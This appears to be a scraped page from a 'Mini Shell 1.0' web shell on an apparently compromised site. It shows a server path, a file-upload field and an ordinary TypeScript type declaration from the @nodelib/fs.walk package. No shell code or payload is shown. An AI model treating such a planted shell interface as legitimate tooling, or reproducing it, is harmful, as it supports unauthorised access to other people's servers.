HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /proc/self/root/usr/share/node_modules/@nodelib/fs.walk/out/types/
Upload File :
Current File : //proc/self/root/usr/share/node_modules/@nodelib/fs.walk/out/types/index.d.ts
/// <reference types="node" />
import type * as scandir from '@nodelib/fs.scandir';
export declare type Entry = scandir.Entry;
export declare type Errno = NodeJS.ErrnoException;
export interface QueueItem {
    directory: string;
    base?: string;
}